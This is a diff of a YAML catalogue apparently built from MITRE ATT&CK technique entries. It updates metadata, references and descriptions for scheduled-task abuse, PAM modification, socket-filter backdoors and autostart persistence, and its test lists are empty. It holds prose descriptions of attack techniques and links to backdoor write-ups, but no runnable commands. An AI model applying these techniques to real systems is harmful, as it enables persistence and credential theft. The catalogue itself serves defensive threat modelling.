       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -26678,17 +27060,16 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -26751,7 +27132,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -26785,8 +27166,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -26795,6 +27176,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -26807,29 +27192,29 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -26876,7 +27261,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -26908,8 +27293,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -26923,6 +27308,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -26935,16 +27324,19 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -27007,7 +27399,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -27072,49 +27463,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27129,20 +27481,57 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1574.007:
@@ -27232,7 +27621,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -27320,7 +27708,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -27405,11 +27792,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27487,7 +27873,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1546.006:
@@ -27520,7 +27905,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27543,11 +27928,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -27605,9 +27989,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1542.001:
@@ -27688,12 +28071,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -27712,7 +28094,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -27726,7 +28107,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -27753,8 +28133,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -27785,7 +28165,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -27842,11 +28223,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -27918,9 +28298,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -27936,12 +28316,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28016,7 +28395,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1542.005:
@@ -28059,7 +28437,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28083,8 +28461,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -28239,31 +28615,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28280,6 +28636,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -28290,9 +28647,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -28300,17 +28661,37 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
